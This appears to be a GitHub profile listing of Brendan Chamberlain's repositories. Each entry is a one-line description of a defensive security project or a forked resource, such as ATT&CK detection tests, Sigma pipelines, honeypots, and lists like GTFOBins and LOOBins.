Brendan Chamberlain's Projects
An detection engineering-specific variant of advent of code.
Small and highly portable detection tests based on MITRE's ATT&CK.
Web app that provides basic navigation and annotation of ATT&CK matrices
Python CLI for normalizing, aggregrating, and decoding auditd logs.
😎 Awesome lists about all kinds of interesting topics
Detection Engineering is a tactical function of a cybersecurity defense program that involves the design, implementation, and operation of detective controls with the goal of proactively identifying malicious or unauthorized activity before it negatively impacts an individual or an organization.
A curated list of awesome Python frameworks, libraries, software and resources
A curated list of awesome threat detection and hunting resources
Bitnami Docker Image for MediaWiki
Check and submit Blue Coat WebPulse website classifications.
This repository contains all Demisto content and from here we share content updates
An example of how to deploy a Detection as Code pipeline using Sigma Rules, Sigmac, Gitlab CI, and Splunk.
A PowerShell script for remotely disabling active Windows 10/2016 device network interfaces.
Splunk Docker GitHub Repository
Fast Incident Response
Full stack, modern web application template. Using FastAPI, React, SQLModel, PostgreSQL, Docker, GitHub Actions, automatic HTTPS and more.
Galah: an LLM-powered web honeypot using the OpenAI API.
A Python CLI utility for quickly converting a list or text file of MITRE ATT&CK technique IDs to a MITRE ATT&CK Navigator layer .JSON file.
12 Lessons, Get Started Building with Generative AI 🔗 https://microsoft.github.io/generative-ai-for-beginners/
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems
:snake: :mag: GuardDog is a CLI tool to Identify malicious PyPI and npm packages
Tool to extract indicators of compromise from security reports in PDF format
Python module/cli to get public IP address using ipify's free API.
Living Off the Orchard: macOS Binaries (LOOBins) is designed to provide detailed information on various built-in "living off the land" macOS binaries and how they can be used by threat actors for malicious purposes.
Shows the relevant part of NPM module's README file right in your terminal
A python module for working with ATT&CK
Python script that normalizes a URL that has been rewritten by Microsoft ATP SafeLink protection.